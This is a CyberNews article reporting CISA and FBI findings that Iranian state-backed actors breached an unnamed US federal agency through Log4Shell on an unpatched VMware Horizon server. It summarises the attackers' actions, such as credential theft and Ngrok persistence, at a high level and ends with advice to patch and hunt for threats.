© 2022 CyberNews - Latest tech news,
product reviews, and analyses.

If you purchase via links on our site, we may receive affiliate commissions.

Iran-sponsored actor breached US federal agency


Threat actor penetrated an unnamed US agency exploiting Log4Shell vulnerability in an unpatched VMware Horizon server, the US cybersecurity agency said.

CISA conducted an incident response management at a Federal Civilian Executive Branch Iran-sponsored actor breached US federal agency (FCEB) organization this summer, suspecting advanced persistent threat (APT) activity.

The threat actor behind the attack exploited a known vulnerability in a popular logging library Log4j.

The server the federal agency was using was unpatched. As a result, threat actors managed to install crypto mining software, move laterally to the domain server, compromise credentials, and implant Ngrok reverse proxies to maintain persistence.

CISA and FBI assess that Iranian APT actors were behind the cyberattack but haven’t attributed it to a particular Iranian threat actor.

The threat actor was observed to execute Mimikatz to harvest credentials and create a rogue domain administrator account to propagate to several hosts within the network.

Threat actors disabled Windows Defender to install Ngrok executables and configuration files upon logging in.

They also changed the password for the local administrator account should the rogue domain administrator account get detected.

“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities.”


More from Cybernews:

“Russia’s attempts to influence the course of events are quite insignificant,” Ukrainian experts think

Amazon cloud databases expose user data, study finds

Scalper bots are getting ready to snatch your Black Friday discounts

Suffolk police accidentally published victims’ data on its website

Most data-hungry Chrome extensions: writers and shoppers beware

Subscribe to our newsletter



Leave a Reply

Your email address will not be published. Required fields are marked